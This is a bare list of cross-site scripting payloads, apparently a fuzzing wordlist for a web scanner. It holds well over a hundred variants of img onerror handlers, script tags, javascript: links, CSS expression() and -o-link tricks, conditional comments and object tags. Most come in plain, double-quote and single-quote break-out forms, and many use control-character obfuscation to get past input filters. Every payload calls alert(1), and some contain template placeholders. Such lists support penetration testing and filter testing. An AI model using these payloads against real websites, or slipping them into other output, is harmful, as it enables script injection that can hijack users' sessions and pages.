<img \x39src=x onerror="javascript:alert(1)">
"><img \x39src=x onerror="javascript:alert(1)">
'><img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
"><img \x00src=x onerror="javascript:alert(1)">
'><img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
"><img src\x09=x onerror="javascript:alert(1)">
'><img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
"><img src\x10=x onerror="javascript:alert(1)">
'><img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
"><img src\x13=x onerror="javascript:alert(1)">
'><img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
"><img src\x32=x onerror="javascript:alert(1)">
'><img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
"><img src\x12=x onerror="javascript:alert(1)">
'><img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
"><img src\x11=x onerror="javascript:alert(1)">
'><img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
"><img src\x00=x onerror="javascript:alert(1)">
'><img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
"><img src\x47=x onerror="javascript:alert(1)">
'><img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
"><img src=x\x09onerror="javascript:alert(1)">
'><img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
"><img src=x\x10onerror="javascript:alert(1)">
'><img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
"><img src=x\x11onerror="javascript:alert(1)">
'><img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
"><img src=x\x12onerror="javascript:alert(1)">
'><img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
"><img src=x\x13onerror="javascript:alert(1)">
'><img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
"><img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
'><img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
"><img src=x onerror=\x09"javascript:alert(1)">
'><img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
"><img src=x onerror=\x10"javascript:alert(1)">
'><img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
"><img src=x onerror=\x11"javascript:alert(1)">
'><img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
"><img src=x onerror=\x12"javascript:alert(1)">
'><img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
"><img src=x onerror=\x32"javascript:alert(1)">
'><img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
"><img src=x onerror=\x00"javascript:alert(1)">
'><img src=x onerror=\x00"javascript:alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>
"><a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>
'><a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>
<img src="x` `<script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>"` `>
"><img src="x` `<script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>"` `>
'><img src="x` `<script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
"><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>
'><script>javascript:alert(1)</script>
</ScrIpt><script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
"><img src onerror /" '"= alt=javascript:alert(1)//">
'><img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
"><title onpropertychange=javascript:alert(1)></title><title title=>
'><title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
"><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
'><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
<!--[if]><script>javascript:alert(1)</script -->
"><!--[if]><script>javascript:alert(1)</script -->
'><!--[if]><script>javascript:alert(1)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> -->
"><!--[if<img src=x onerror=javascript:alert(1)//]> -->
'><!--[if<img src=x onerror=javascript:alert(1)//]> -->
<script src="/\%(jscript)s"></script>
"><script src="/\%(jscript)s"></script>
'><script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
"><script src="\\%(jscript)s"></script>
'><script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
'><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
"><a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
'><a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
"><style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
'><style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
"><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
'><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
"><style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
'><style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import'%(css)s?]</style>X
